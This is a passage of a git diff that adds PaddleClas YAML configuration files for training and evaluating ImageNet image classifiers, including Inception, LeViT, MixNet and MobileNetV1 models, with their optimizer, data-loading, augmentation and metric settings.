RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - GoogLeNetTopkAcc: + topk: [1, 5] + Eval: + - GoogLeNetTopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV3.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV3.yaml new file mode 100644 index 0000000..fa8b64a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV3.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: InceptionV3 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV4.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV4.yaml new file mode 100644 index 0000000..6a6dbb6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV4.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: InceptionV4 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128.yaml new file mode 100644 index 0000000..1016421 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_128 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128S.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128S.yaml new file mode 100644 index 0000000..84c0353 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128S.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_128S + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_192.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_192.yaml new file mode 100644 index 0000000..5b9c107 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_192.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_192 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_256.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_256.yaml new file mode 100644 index 0000000..a7e99af --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_256.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_256 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_384.yaml new file mode 100644 index 0000000..f6d5852 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_L.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_L.yaml new file mode 100644 index 0000000..b3c04aa --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_L.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MixNet_L + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_M.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_M.yaml new file mode 100644 index 0000000..82248b6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_M.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MixNet_M + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_S.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_S.yaml new file mode 100644 index 0000000..20d68c7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MixNet/MixNet_S.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MixNet_S + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1.yaml new file mode 100644 index 0000000..53d1d1d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV1/MobileNetV1.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: MobileNetV1 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + 